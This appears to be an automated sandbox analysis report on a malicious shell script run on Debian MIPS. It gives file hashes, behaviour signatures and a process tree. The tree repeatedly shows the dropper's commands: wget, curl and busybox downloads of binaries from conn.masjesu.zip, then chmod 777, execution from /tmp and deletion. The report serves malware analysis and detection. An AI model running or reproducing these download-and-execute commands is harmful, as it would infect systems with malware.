Analysis
-
max time kernel
103s -
max time network
132s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
24/11/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
-
Size
10KB
-
MD5
844b57641f1b3245860dd2c581f61721
-
SHA1
8e5b599c9c28222db2f5ebbb896754a6820dddec
-
SHA256
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6
-
SHA512
b1afb1b8bf5e228f208109d75807797e71559784a2243e7b770551655332ee754ccb0dde3f95434e268884b7864fc7217199bf5b9194ad8c121f7acf60dceb06
-
SSDEEP
192:T7gcXS92oJyOGppODXRWm3Tf92oJyOAppODXT3TsZ:T7gcXS92oJyOdWqf92oJyO9sZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- System Network Configuration Discovery
PID:759
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:768
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:769
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- System Network Configuration Discovery
PID:784
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:793
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:822
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- System Network Configuration Discovery
PID:823
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- System Network Configuration Discovery
PID:826
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- System Network Configuration Discovery
PID:830
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:849
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:879
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:884
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:905
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:926
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵PID:947
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:949
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:954
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:975
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:982
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1003
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
